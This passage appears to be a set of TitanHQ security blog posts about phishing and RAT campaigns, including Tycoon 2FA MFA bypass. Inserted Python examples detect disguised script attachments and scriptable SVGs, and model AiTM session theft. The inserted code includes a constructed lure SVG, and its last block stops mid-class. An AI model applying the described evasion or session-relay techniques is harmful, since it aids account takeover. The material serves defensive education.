The advantage of this type of attack is the user is shown the exact login page for the credentials being\r\ntargeted. That means that the attacker does not need to create and maintain a copy of the login page.\r\nWhen the user enters their credentials, they are sent to the legitimate login page by the attacker, and the response\r\nfrom the login page is relayed to the victim. The threat actor’s application captures the credentials and the tokens\r\nand cookies in the response. In these Cloudflare Workers phishing campaigns, users can identify the scam by\r\nlooking for the *.workers.dev domain and should be trained to always access login pages by typing the URL\r\ndirectly into the web browser.\r\nDefending against sophisticated phishing attacks requires a combination of security measures including an email\r\nsecurity solution with AI/machine learning capabilities and email sandboxing, regular security awareness training,\r\nand web filtering to block malicious websites and inspect HTTP and HTTPS traffic. For more information\r\non improving your defenses, give the TitanHQ team a call.\r\nTwo Dozen Healthcare Email Accounts Compromised in Targeted Phishing\r\nCampaign\r\nby G Hunt | April 25, 2024 | Email Scams, Phishing \u0026 Email Spam\r\nMany phishing campaigns involve indiscriminate emails that are sent in high volume in the hope that some\r\nrecipients will respond. These campaigns tend to involve lures that are likely to be opened by as many users as\r\npossible such as missed deliveries, security warnings about unauthorized account access, and payments that will\r\nsoon be applied to accounts. This spray-and-pray tactic is not nearly as effective as more tailored campaigns\r\ntargeting specific types of users, and to make up for this, the campaigns involve huge volumes of messages. 
These\r\ncampaigns are relatively easy for email security solutions to detect.\r\nPhishing campaigns that target employees in a single organization can be much harder to identify. The threat actor\r\ntailors the message to the organization being targeted, and even to specific employees in the organization. These\r\ncampaigns often use compromised vendor email accounts, with the emails being sent from trusted domains. There\r\nis a much greater chance of these emails landing in inboxes and the emails being opened by employees.\r\nCampaigns such as this can be highly effective and often result in many email accounts in the organization being\r\ncompromised.\r\nA recent example of this type of attack and the impact it can have comes from California. The Los Angeles\r\nCounty Department of Health Services, an integrated health system that operates public hospitals and clinics in\r\nL.A. County, was targeted in a phishing campaign between February 19, 2024, and February 20, 2024. The emails\r\nappeared to have been sent by a trusted sender, landed in inboxes, and were opened by many employees. The\r\nemails contained a hyperlink that directed users to a website where they were told they needed to enter their login\r\ncredentials. 23 employees fell for the scam and entered their credentials.\r\nThe credentials were captured, and the threat actor was able to access the employees’ email accounts, which\r\ncontained sensitive patient data such as names, dates of birth, contact information, medical record numbers, dates\r\nof service, medical information, and health plan information. While the information exposed in the attack could\r\nnot be used for identity theft – Social Security numbers were not compromised – the attacker gained access to\r\ninformation that could be used for medical identity theft. 
The patients affected could also be targeted in very\r\nconvincing phishing campaigns to obtain further information such as Social Security numbers. Similar attacks\r\nhave been reported by other healthcare organizations where the email accounts contained vast amounts of data,\r\nincluding tens of thousands of Social Security numbers and sensitive financial information.\r\nAfter attacks such as this, additional security awareness training is provided to the workforce to raise awareness of\r\nthe threat from phishing; however, the provision of comprehensive training regularly throughout the year will go a\r\nlong way toward ensuring that attacks such as this do not succeed and that if they do, the resultant data breach is\r\nfar less severe.\r\nTitanHQ’s SafeTitan security awareness training platform allows organizations to conduct comprehensive training\r\ncontinuously, and since each training module is a maximum of 10 minutes, it is easy to fit the training into busy\r\nworkflows. The training platform has a huge range of content, covering a broad range of threats, and when\r\nprograms are run continuously and employees complete a few training modules a month, susceptibility to phishing\r\ndrops considerably, especially when the SafeTitan phishing simulator is also used. The simulator includes\r\ntemplates taken from recent real-world phishing campaigns. If a user responds to one of these simulations, they\r\nare immediately told where they went wrong and are required to complete a training module relevant to that\r\nthreat.\r\nEnd-user security awareness training is an important part of your cybersecurity arsenal, but it is also vital to block\r\nas many phishing emails as possible. TitanHQ’s SpamTitan email security is an advanced, AI and machine\r\nlearning-driven anti-spam solution that blocks more than 99.9% of spam email and phishing threats. 
The solution\r\nincludes twin antivirus engines for blocking known malware, and sandboxing for blocking zero-day threats, and is\r\na highly effective spam filter for Office 365. With SafeTitan security awareness training and an advanced\r\nMicrosoft 365 spam filter from TitanHQ, businesses will be well protected from phishing threats.\r\nAll TitanHQ solutions are intuitive, easy to use, and can be set up in just a few minutes and are available on a free\r\ntrial to allow you to test them out for yourself before making a purchase decision. Independent reviews from\r\ngenuine users of TitanHQ solutions show SpamTitan is much loved by users. On G2 reviews, SpamTitan is\r\nconsistently given 5-star reviews by end users, who rate it the best spam filter for Outlook due to its effectiveness,\r\nlow cost, ease of use, and the excellent customer service from the TitanHQ team.\r\nSafeTitan and SpamTitan are available on a free trial to allow you to test them out for yourself before making a\r\npurchase decision. Give the TitanHQ team a call today to take the first step toward improving your phishing\r\ndefenses.\r\nRemcos RAT Now Distributed in Spam Email Using VHD Attachments\r\nby G Hunt | April 24, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are constantly evolving their tactics for delivering malware and one of the most recent changes\r\nconcerns the Remcos RAT. Remcos was developed by Breaking Security as a legitimate remote administration\r\ntool that can be used for network maintenance, system monitoring, surveillance, and penetration testing; however,\r\nthe tool has been weaponized to create the Remcos Remote Access Trojan (RAT).\r\nThe Remcos RAT has extensive capabilities and has been used by cybercriminals since 2016. 
The malware\r\nallows threat actors to take control of systems and maintain persistent, highly privileged remote access. The\r\nmalware can be used for a range of purposes, with threat actors commonly using it for credential theft, man-in-the-middle internet connections, and to create botnets of infected devices that can be used for distributed denial of\r\nservice attacks (DDoS).\r\nThe Remcos RAT is distributed in spam email campaigns. Since 2016, the most common method for distributing\r\nthe malware used spam emails with malicious Office attachments. Social engineering techniques were used to\r\ntrick users into opening the files and enabling macros; however, campaigns have recently been detected that\r\ndeliver the malware via weaponized virtual hard disk (VHD) files.\r\nSecurity awareness training often focuses on teaching users to be careful when opening Office files and other file\r\ntypes commonly associated with malware distribution. The change to a more unusual file type could result in the\r\nfile being opened, and VHD files are less likely to be identified as malicious by email security solutions.\r\nAn analysis of the extracted VHD files revealed a shortcut file that contained a PowerShell command line that\r\nexecuted a malicious script that ultimately delivered the Remcos RAT via a sophisticated multi-stage delivery\r\nmethod designed to evade security solutions. Once installed, the malware can log keystrokes, take screenshots,\r\nand exfiltrate data to its command-and-control server. The malware also has mass-mailer capabilities and can send\r\ncopies of itself via email from an infected device. According to Check Point, the Remcos RAT rose to the 4th most\r\nprevalent malware threat in March 2024.\r\nThe constantly changing tactics for distributing malware mean network defenders need cybersecurity solutions\r\nthat can adapt and detect zero-day threats. 
SpamTitan is an advanced email filtering service with AI and machine\r\nlearning-driven threat detection which is capable of identifying and blocking novel phishing and malware\r\ndistribution methods. The machine learning algorithm uses predictive technology to identify previously unseen\r\nattacks, emails are scanned using twin antivirus engines, and suspicious file types are sent to a next-generation\r\nsandbox for behavioral analysis, ensuring even previously unseen malware variants can be identified and blocked.\r\nSpamTitan scans all inbound emails and also includes an outbound email filter to identify malicious emails that\r\nare sent from compromised email accounts and by malicious insiders. SpamTitan also has data loss protection\r\ncapabilities, allowing IT teams to detect and block internal data loss. If your corporate email filter does not include\r\nadvanced threat protection including AI-driven detection and sandboxing, or if you rely on Microsoft’s anti-spam\r\nand anti-phishing protection, sophisticated threats such as zero-day attacks are unlikely to be blocked and your\r\nbusiness will be at risk.\r\nGive the TitanHQ team a call today to find out more about SpamTitan. SpamTitan is delivered as a cloud-based\r\nanti-spam service that integrates seamlessly with Microsoft 365 to improve protection, or as a gateway solution\r\nfor on-premises protection, which can be installed on existing hardware as a virtual anti-spam appliance.\r\nFinancial Institutions Targeted in Phishing Campaign That Delivers the\r\nJSOutProx RAT\r\nby G Hunt | April 17, 2024 | Email Scams, Phishing \u0026 Email Spam\r\nA phishing campaign has been running since late March that tricks people into installing a new version of the\r\nremote access trojan, JSOutProx. 
JSOutProx was first identified in 2019 and is a backdoor that utilizes JavaScript\r\nand .NET that allows users to run shell commands, execute files, take screenshots, control peripheral devices, and\r\ndownload additional malware payloads. The malware is known to be used by a threat actor tracked as Solar\r\nSpider, which mostly targets financial institutions in Central Europe, South Asia, Southeast Asia, and Africa, with\r\nthe latest version of the malware also being used to target organizations in the Middle East.\r\nThe malware has mostly been used on banks and other financial institutions. If infected, the malware collects\r\ninformation about its environment and the attackers then download any of around 14 different plug-ins from either\r\nGitHub or GitLab, based on the information the malware collects about its operating environment. The malware\r\ncan be used to control proxy settings, access Microsoft Outlook account details, capture clipboard content, and\r\nsteal one-time passwords from Symantec VIP.\r\nLike many other remote access trojans, JSOutProx is primarily delivered via phishing emails. A variety of lures\r\nhave been used in the phishing emails but the latest campaign uses fake notifications about SWIFT payments in\r\ntargeted attacks on financial institutions and MoneyGram payment notifications in attacks on individuals, which\r\naim to trick the recipients into installing the malware.\r\nThe latest campaign uses JavaScript attachments that masquerade as PDF files of financial documents contained\r\nin .zip files. If the user attempts to open the fake PDF file, the JavaScript is executed deploying the malware\r\npayload. The main aim of the campaign is to steal user account credentials, gather sensitive financial documents,\r\nand obtain payment account data, which can either be used to make fraudulent transactions or be sold to other\r\nthreat actors on the dark web. 
Compromised email accounts are also used in Business Email Compromise (BEC) attacks to steal funds from the victim’s clients. According to Visa, “The JSOutProx malware poses a serious threat to financial institutions around the world, and especially those in the AP region as those entities have been more frequently targeted with this malware.”\r\nSince phishing is the main method of malware delivery, the best defense against attacks is advanced anti-spam software combined with end-user security awareness training. JSOutProx is heavily obfuscated and is able to bypass many traditional anti-spam solutions and signature-based anti-virus software. An anti-spam solution with AI and machine learning capabilities can identify the signs of malicious emails by analyzing message headers and content to determine how they deviate from the emails the business typically receives, and by searching for indicators of phishing and malware delivery drawn from the latest threat intelligence.\r\nTo identify the malicious attachments, an anti-spam solution also requires sandboxing. Messages that pass standard antivirus checks are sent to the sandbox, where the attachment’s behavior is analyzed to identify malicious actions rather than relying on malware signatures. SpamTitan can extract and analyze files in compressed archives such as .zip and .rar files, and in recent independent tests SpamTitan achieved a phishing catch rate of 99.914% and a malware catch rate of 99.511%, with a false positive rate of 0.00%. SpamTitan from TitanHQ is delivered as either a hosted anti-spam service or an anti-spam gateway that is installed on-premises on existing hardware. 
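The lure above relies on a Windows quirk: a file named like `Payment_advice.pdf.js` shows a PDF-looking name but is a script, and it arrives inside a .zip so the mail filter never sees the .js directly. The following is an added example, written for this page and not SpamTitan’s code, of the archive check a gateway or sandbox pre-filter needs: it walks a .zip (including nested .zips) and flags members whose real extension is a script or executable type, especially when a document extension sits just before it. The sample archive, its file names, and the extension lists are constructed for the demonstration.

```python
"""Scan an email attachment archive for script files disguised as documents.

Added example (not SpamTitan code). Shows the check a mail gateway needs for the
JSOutProx lure: a .js file whose name mimics a PDF, packed inside a .zip.
The sample archive is constructed in memory; no files are written.
"""
import io
import zipfile

# Extensions that Windows hands to a script host or loader on double-click.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
                     ".bat", ".cmd", ".scr", ".lnk", ".exe", ".dll", ".msi"}
# Extensions a victim expects to be harmless documents or pictures.
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
MAX_NESTING = 3  # stop unpacking zip-in-zip chains beyond this depth


def classify_name(name: str) -> list:
    """Return the reasons a member name looks like a disguised script (empty if none)."""
    reasons = []
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) < 2:
        return reasons
    real_ext = "." + parts[-1]
    if real_ext in SCRIPT_EXTENSIONS:
        reasons.append(f"script/executable extension {real_ext}")
        # 'statement.pdf.js': a document extension right before the real one.
        if len(parts) >= 3 and "." + parts[-2] in DECOY_EXTENSIONS:
            reasons.append(f"double extension mimicking .{parts[-2]}")
        # Runs of spaces push the real extension out of view in Explorer.
        if "  " in base:
            reasons.append("whitespace padding in file name")
    return reasons


def scan_zip_bytes(data: bytes, depth: int = 0, prefix: str = "") -> list:
    """Walk a zip (and nested zips) and return (path, reasons) for suspicious members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            reasons = classify_name(info.filename)
            if reasons:
                findings.append((path, reasons))
            if info.filename.lower().endswith(".zip"):
                if depth + 1 >= MAX_NESTING:
                    findings.append((path, ["nested archive beyond depth limit"]))
                    continue
                findings.extend(scan_zip_bytes(zf.read(info), depth + 1, path + "!/"))
    return findings


def build_sample_lure() -> bytes:
    """Constructed sample: a zip-in-zip in the style of the SWIFT payment-advice lure."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        # Constructed placeholder body; inert, stands in for the real obfuscated script.
        zf.writestr("SWIFT_MT103_payment_advice.pdf.js", "// constructed placeholder\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("Payment Notification.zip", inner.getvalue())
        zf.writestr("readme.txt", "Please find the attached payment advice.")
    return outer.getvalue()


if __name__ == "__main__":
    for path, reasons in scan_zip_bytes(build_sample_lure()):
        print(path, "->", "; ".join(reasons))
```

The name check is the cheap first pass; an attachment it flags should still go to the sandbox, and one it passes still needs antivirus scanning, since a plain `.js` with an honest name is just as dangerous.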
SpamTitan has been developed to be easy to implement and use, and to meet the needs of businesses of all sizes and managed service providers.\r\nPhishing emails target employees, so it is important to teach them how to identify phishing emails. Due to the fast-changing threat landscape, security awareness training should be provided to the workforce continuously, and phishing simulations should be conducted to give employees practice at identifying threats. SafeTitan from TitanHQ can be used to create effective training programs that run throughout the year and keep employees up to date on the latest threats and the tactics, techniques, and procedures used by malicious actors. SafeTitan also delivers relevant training in real time in response to security mistakes and phishing simulation failures. Check out these anti-spam tips for further information on improving your defenses against phishing, and get in touch with TitanHQ for more information on SpamTitan email security and the SafeTitan security awareness training platform.\r\nSophisticated Phishing Campaign Delivers RATs via SVG File Attachments\r\nby G Hunt | April 15, 2024 | Email Scams, Phishing \u0026 Email Spam\r\nA sophisticated phishing campaign has been detected that is being used to deliver a variety of Remote Access Trojan (RAT) malware, including Venom RAT, Remcos RAT, and NanoCore RAT, as well as a stealer that targets cryptocurrency wallets. The campaign uses email as the initial access vector, with the messages purporting to be an invoice for a shipment that has recently been delivered. The emails include a Scalable Vector Graphics (SVG) file attachment. SVG is an increasingly common XML-based vector image format, and because it is XML it can carry embedded script that a browser will run when the file is opened.\r\nIf the user opens the SVG file, the embedded script drops a compressed (zip) file on the user’s device. 
The zip file contains a batch file that has been obfuscated with a tool (most likely BatCloak) so that it evades anti-virus software. If it is not detected as malicious, it unpacks a ScrubCrypt batch file (another tool used to bypass antivirus protections), which in turn delivers two executable files that are used to deploy and execute the RAT and establish persistence. Along the way the loader tampers with AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows), the two Windows interfaces that security products rely on to inspect scripts in memory and to receive runtime telemetry, so that the payload is neither scanned nor logged.\r\nOne of the primary payloads is Venom RAT, which establishes a connection with its command and control (C2) server, transmits sensitive information gathered from the compromised device, and runs commands from its C2 server. Venom RAT can download additional modules and malware payloads, including a stealer that targets folders associated with cryptocurrency wallets and applications including Atomic Wallet, Electrum, Exodus, Foxmail, and Telegram.\r\nThe sophisticated nature of this campaign and the obfuscation used to hide the malicious payloads from traditional antivirus software demonstrate the need for advanced email defenses and end-user training. Email security solutions that rely on malware signatures are easily bypassed, which is why it is important to use an anti-spam solution that incorporates sandboxing for blocking malware, and AI and machine learning capabilities to identify malicious emails.\r\nSpamTitan uses AI and machine learning algorithms to detect phishing emails that other solutions miss, including Microsoft’s basic and advanced anti-phishing mechanisms for Microsoft 365. SpamTitan includes Sender Policy Framework (SPF) checks, SURBLs, RBLs, Bayesian analysis, and more, and the machine learning algorithms can detect email messages that deviate from the typical messages received by a business and can identify header anomalies, address spoofing, and suspect email body content. 
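SVG is XML, so it can legitimately carry `<script>` elements, `on*` event attributes, `javascript:` links and `<foreignObject>` HTML, and a browser that opens the “image” will run them; that is what lets an SVG attachment assemble and drop a zip. The added example below (not from the original post, and not Fortinet’s or TitanHQ’s code) parses an SVG and reports these constructs so a mail pipeline can quarantine the attachment before the user opens it. Both sample SVGs and the rule names are constructed for the demonstration.

```python
"""Flag SVG attachments that carry active content.

Added example (not from the original post or from any vendor). SVG is XML and may
embed script, event handlers and foreign HTML, which a browser runs when the
'image' is opened. The detection rules and both samples are constructed here.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that execute or embed foreign content when the SVG is rendered.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "use"}
URI_SCHEME = re.compile(r"^\s*(javascript|data|vbscript):", re.IGNORECASE)
# Findings that should quarantine the attachment outright.
BLOCK_ON = {"script", "event-handler", "javascript-uri", "foreignobject", "data-uri"}


def _local(tag: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return tag.rsplit("}", 1)[-1].lower()


def analyze_svg(svg_text: str) -> dict:
    """Return {'findings': [(rule, detail), ...], 'block': bool} for one SVG document."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Malformed XML is itself suspicious for something that claims to be an image.
        return {"findings": [("parse-error", str(exc))], "block": True}
    if _local(root.tag) != "svg":
        findings.append(("not-svg-root", root.tag))
    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            findings.append(("script", (el.text or "").strip()[:60]))
        elif name in ACTIVE_TAGS:
            findings.append((name, f"<{name}> element present"))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):  # onload, onclick, onerror, ...
                findings.append(("event-handler", f"{aname}={value[:60]}"))
            if aname == "href":  # plain href or xlink:href
                m = URI_SCHEME.match(value)
                if m:
                    scheme = m.group(1).lower()
                    rule = "javascript-uri" if scheme in ("javascript", "vbscript") else "data-uri"
                    findings.append((rule, value[:60]))
    block = any(rule in BLOCK_ON for rule, _ in findings)
    return {"findings": findings, "block": block}


# Constructed samples: a benign logo and a lure in the style of an "invoice" SVG.
BENIGN_SVG = f"""<svg xmlns="{SVG_NS}" width="100" height="40">
  <rect width="100" height="40" fill="#036"/><text x="10" y="25" fill="#fff">ACME</text>
</svg>"""

LURE_SVG = f"""<svg xmlns="{SVG_NS}" xmlns:xlink="{XLINK_NS}" onload="init()">
  <text x="10" y="20">Invoice #4471 - click to download</text>
  <a xlink:href="javascript:void(0)"><rect width="200" height="40"/></a>
  <script><![CDATA[ function init(){{ /* would assemble and save a zip here */ }} ]]></script>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        result = analyze_svg(doc)
        print(label, "block" if result["block"] else "allow", result["findings"])
```

In a production pipeline, parse untrusted XML with a hardened parser (for example the `defusedxml` package) rather than the stdlib directly, and treat a `data:` URI the same as a script: HTML smuggling payloads are routinely carried that way.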
All inbound messages are subjected to standard and advanced malware checks, starting with scans by twin anti-virus engines, including unpacking and scanning of compressed files. Attachments that pass those signature checks are then sent to the sandbox for behavioral analysis.\r\nIn the cloud-based sandbox, malicious actions are identified, such as attempts to fetch additional files (as is commonly seen in multi-stage attacks) and C2 call-outs. In recent independent tests (Virus Bulletin), SpamTitan achieved a phishing catch rate of 99.914%, a malware catch rate of 99.511%, and a false positive rate of 0.00%.\r\nAs phishing attacks become more sophisticated, your defenses need to keep pace. With email security protection provided by SpamTitan and security awareness training delivered using TitanHQ’s award-winning SafeTitan security awareness training and phishing simulation platform, you will be well protected from email-based attacks.\r\nGive the TitanHQ team a call today to find out more about how you can improve your defenses against email-based attacks with sandboxing technology and how to add more layers to your defenses to block the full range of cyberattacks.\r\nTitanHQ’s Anti-Phishing Solution Now Has Auto-Remediation Feature\r\nby G Hunt | March 31, 2024 | Industry News, Network Security\r\nTitanHQ has added a new auto-remediation feature to its Microsoft 365 anti-phishing solution, PhishTitan, to better meet the needs of managed service providers (MSPs) and M365 administrators.\r\nAccording to Statista, more than two million companies worldwide use Microsoft 365, including more than 1.3 million in the United States. Given the number of companies that use Microsoft 365, it is naturally a big target for cybercriminals and nation-state actors. 
If threat actors can steal M365 credentials, they can access a treasure trove\r\nof valuable business data and gain a foothold for more extensive and damaging attacks. Microsoft offers\r\nprotection against spam, phishing, malware, and business email compromise attacks, but the best level of\r\nprotection is only available with its costly E5 premium license, which is prohibitively expensive for many small\r\nbusinesses. Even companies that can afford this costly license do not get cutting-edge protection against phishing\r\nand BEC attacks.\r\nTo consistently block sophisticated phishing attempts, BEC attacks, and zero-day threats, businesses need more\r\nadvanced protection than Microsoft can offer, and many turn to PhishTitan from TitanHQ – an integrated Cloud\r\nEmail Security Solution (ICES) that provides cutting-edge protection against the most damaging, sophisticated\r\nphishing threats, BEC, account takeover, VIP impersonation, and zero-day attacks. In recent Virus Bulletin Tests,\r\nthe engine that powers PhishTitan achieved an exceptional spam catch rate of 99.983%, a malware catch rate of\r\n99.511%, and a phishing catch rate of 99.914%, with zero false positives. PhishTitan was shown to outperform\r\nMicrosoft’s highest level of protection. For every 80,000 emails received, PhishTitan blocks 20 more unique and\r\nsophisticated attacks than Microsoft’s E5 filtering option.\r\nThe latest update to PhishTitan adds a new auto-remediation feature, which allows administrators to tailor the\r\nmanagement of malicious emails based on the severity level. 
When a threat is detected, a banner is added to the email that warns the user about the threat; auto-remediation goes further and lets administrators apply rules that deal with these messages according to the threat level, such as automatically diverting them to the junk folder. This feature acts like a virtual SOC and minimizes the risk to end users, especially individuals who tend to ignore email banners.\r\nAuto-remediation is just one of the new features PhishTitan has gained since its launch. PhishTitan has also received an update to protect users from the growing threat of QR code phishing attacks (QRishing). QR codes are problematic for many anti-spam and anti-phishing solutions because the URL is encoded in an image rather than in the message text, so the filter never sees a link to check, which is why cybercriminals are increasingly using QR codes in their phishing emails. PhishTitan decodes the URLs embedded in QR codes, assesses the risk, and notifies end users.\r\nPhishTitan also supports allow-listing, which administrators can use to mark trusted senders so that their emails are always delivered, and notifications can be fed into Microsoft Teams. Since administrators can spend a considerable amount of time in the application, a dark mode has been added to improve the user experience, and many more updates are planned and will be rolled out soon.\r\n“We are excited to introduce Auto Remediation, QR code protection, and many additional powerful new features to our valued customers. At TitanHQ, we collaborate closely with partners to develop tailored solutions addressing critical customer IT security challenges,” said TitanHQ CEO, Ronan Kavanagh. 
“PhishTitan provides MSPs with\r\nan unmatched value proposition, featuring effortless deployment and lucrative recurring revenue streams,\r\nultimately delivering a positive return on investment.”\r\nIf you want to improve protection against email threats or have any questions about PhishTitan, give the TitanHQ\r\nteam a call. TitanHQ also offers award-winning DNS filtering, spam filtering, email encryption, email archiving,\r\nsecurity awareness training, and phishing simulation solutions, all of which are available on a free trial.\r\nTitanHQ Achieves Virus Bulletin VBSpam+ Certification with 99.91% Phishing\r\nCatch Rate in Latest Tests\r\nby G Hunt | March 29, 2024 | Phishing \u0026 Email Spam, Spam Software\r\nTitanHQ has claimed a Top 3 position in a recent Virus Bulletin email security test, achieving an exceptional\r\n99.98% spam catch rate and 99.91% phishing catch rate for the cutting-edge filtering engine that powers the\r\nSpamTitan (email security) and PhishTitan (phishing protection) solutions, earning TitanHQ the prestigious\r\nVBSpam+ certification for the products.\r\nVirus Bulletin is a security information portal and independent testing and certification body that has earned a\r\nformidable reputation within the cybersecurity community for providing security professionals with intelligence\r\nabout the latest developments in the global threat landscape. Virus Bulletin conducts regular tests of security\r\nsolutions to determine how well they perform at detecting and blocking threats, and for more than 20 years has\r\nbeen benchmarking cybersecurity solutions. Virus Bulletin’s public certifications cover all types of security threat\r\nprotection, including anti-spam and anti-phishing solutions for enterprises.\r\nIn the Q1, 2024 tests, Virus Bulletin assessed nine comprehensive email security solutions, including TitanHQ’s\r\nemail security suite which comprises SpamTitan and PhishTitan. 
The email security solutions were put to the test to assess how effective they are at blocking unsolicited and unwanted spam emails and malicious messages of all types. TitanHQ’s solutions achieved exceptional scores at blocking spam and phishing emails, with a spam catch rate of 99.983%, a malware catch rate of 99.511%, and a phishing catch rate of 99.914%, with zero false positives. The final score for the Q1 2024 tests was 99.983, cementing TitanHQ’s position as a leading provider of anti-phishing and anti-spam solutions for managed service providers and businesses.\r\n“This test reaffirms TitanHQ’s unrivaled prowess in spam and phishing protection—we stand as the first choice for combating phishing attempts and spam infiltrations,” said Ronan Kavanagh, CEO at TitanHQ. “Our customers need not settle for anything less. With TitanHQ solutions, they receive unparalleled defense against phishing and spam and experience minimal false positives.”\r\nWhile there are many ways that cybercriminals and nation-state actors breach company networks and gain access to sensitive data, phishing is the leading initial access vector. Despite phishing being such a prevalent threat, many businesses lack security solutions that can consistently identify and block these malicious messages, which results in costly compromises, data breaches, and devastating ransomware attacks. According to one study by researchers at CoreView of 1.6 million Microsoft 365 users, 90% lacked essential security protections that can combat threats such as phishing.\r\nWhile Microsoft has security solutions that block spam and phishing emails, they do not catch every advanced phishing threat. PhishTitan has been developed to work seamlessly with M365 and catch the phishing threats that M365 misses. 
Even Microsoft’s most advanced anti-phishing protection, the costly E5 premium\r\nsecurity offering, fails to block many advanced threats. Testing has shown that for every 80,000 emails received,\r\nPhishTitan identifies and blocks 20 unique, sophisticated phishing attempts that Microsoft’s top solution misses,\r\nand many businesses cannot afford Microsoft’s top level of protection and are reliant on its basic anti-spam and\r\nanti-phishing protection.\r\nIf you want to improve your defenses against phishing and malware and block more spam emails, give the\r\nTitanHQ team a call and ask about SpamTitan and PhishTitan. Both email filtering solutions are available on a\r\nfree trial, so you can put them to the test and see for yourself the difference they make.\r\nTycoon 2FA Phishing Kit Targets M365 and Gmail Credentials and Bypasses MFA\r\nby G Hunt | March 27, 2024 | Phishing \u0026 Email Spam\r\nPhishing is one of the most common methods used to gain access to credentials; however, businesses are\r\nincreasingly implementing multi-factor authentication (MFA) which adds an extra layer of protection and means\r\nstolen credentials cannot be used on their own to gain access to accounts. An additional authentication factor is\r\nrequired before access to the account is granted. While any form of MFA is better than none, MFA does not\r\nprotect against all phishing attacks. There are several popular phishing-as-a-service (PhaaS) platforms that can\r\nsteal credentials and bypass MFA including LabHost, Greatness, and Robin Banks. For a relatively small fee, any\r\ncybercriminal looking to compromise accounts can use the PhaaS platform and gain access to MFA-protected\r\naccounts.\r\nA relatively new PhaaS platform has been growing in popularity since its discovery in October 2023 which has\r\nbeen causing concern in the cybersecurity community. Dubbed Tycoon 2FA, the PhaaS platform is being offered\r\nthrough private Telegram groups. 
Like many other PhaaS platforms, Tycoon 2FA uses adversary-in-the-middle (AiTM) tactics: rather than stealing a password alone, it sits between the victim and the real login service and captures the authenticated session, which gives the attacker access to the account. The phishing kit uses at least 1,100 domains and has been used in thousands of phishing attacks.\r\nLike most phishing attacks, initial contact is made with end users via email. The messages include a malicious link or a QR code. QR codes are popular with phishers because they carry the URL to the end user as an image, which email security solutions struggle to decode and assess. To keep the malicious pages away from automated scanners, the user must pass a security challenge (Cloudflare Turnstile) after clicking the link or following the QR code; only a real browser driven by a person gets through to the phishing content. The page to which the user is then directed targets Microsoft 365 or Gmail credentials. The user’s email address is captured and used to prefill the login page, and when the user enters their password it is captured and they are directed to a fake MFA page.\r\nThe phishing kit uses a reverse proxy server that relays the user’s credentials to the legitimate service in real time. The real service issues its MFA challenge, the victim answers it on the phishing page, the kit relays that answer too, and when the service responds with a session cookie the kit captures it. That cookie is what the attacker then logs in with, so the attacker never needs to replay the one-time code, and the password alone would not have been enough. The user is unlikely to recognize that their account has been compromised, as they are redirected to a legitimate-looking page once the MFA step is passed. According to the researchers, many different threat actors have been using the kit for their phishing campaigns, with the Tycoon 2FA operators having received almost $395,000 in payments to their Bitcoin wallet as of March 2024.\r\n
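To see why the relay described above defeats a one-time code but would not defeat phishing-resistant MFA, the added example below (written for this page, not code from the original post or from TitanHQ or the researchers who analysed Tycoon 2FA) models both sides: a real login service, the user’s authenticator, and the kit sitting between them. The TOTP implementation follows RFC 6238; the origin-bound scheme is a deliberately simplified stand-in for WebAuthn, where the authenticator signs over the origin the browser is actually on and the service accepts only a signature over its own origin. The same relay is what the CryptoChameleon kit described later on this page performs. Domain names, the password, and all keys are constructed for the demonstration.

```python
"""Why an AiTM reverse proxy defeats one-time-password MFA but not origin-bound MFA.

Added example (not from the original post, Sekoia or TitanHQ). Models the relay:
the victim talks to the phishing domain, the kit forwards everything to the real
service, and the service's answers come back through the kit. Domains, secrets and
the origin-bound scheme are constructed; the latter is a simplified WebAuthn.
"""
import hashlib
import hmac
import os
import struct
import time
from typing import Optional

LEGIT_ORIGIN = "https://login.example-tenant.invalid"             # assumed real origin
PHISH_ORIGIN = "https://login.example-tenant.invalid.kit.invalid"  # assumed lure origin
PASSWORD = "correct horse"                                         # constructed


def totp(secret: bytes, for_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1, as authenticator apps compute it."""
    counter = struct.pack(">Q", for_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class Service:
    """The real identity provider: holds the TOTP seed and the device's key."""

    def __init__(self):
        self.totp_seed = os.urandom(20)
        self.device_key = os.urandom(32)   # shared with the user's authenticator
        self.sessions = set()

    def _new_session(self) -> str:
        session = os.urandom(8).hex()
        self.sessions.add(session)
        return session

    def login_totp(self, password: str, code: str, now: int) -> Optional[str]:
        if password != PASSWORD or code != totp(self.totp_seed, now):
            return None
        return self._new_session()

    def challenge(self) -> bytes:
        return os.urandom(16)

    def login_origin_bound(self, challenge: bytes, proof: bytes) -> Optional[str]:
        # The service verifies the proof over (challenge, ITS OWN origin). A proof
        # made for any other origin cannot match, whatever the client claims.
        expected = hmac.new(self.device_key, challenge + LEGIT_ORIGIN.encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, proof):
            return None
        return self._new_session()


class Authenticator:
    """The user's device. Every proof is bound to the origin the browser is on."""

    def __init__(self, service: Service):
        self.totp_seed = service.totp_seed
        self.device_key = service.device_key

    def current_code(self, now: int) -> str:
        return totp(self.totp_seed, now)

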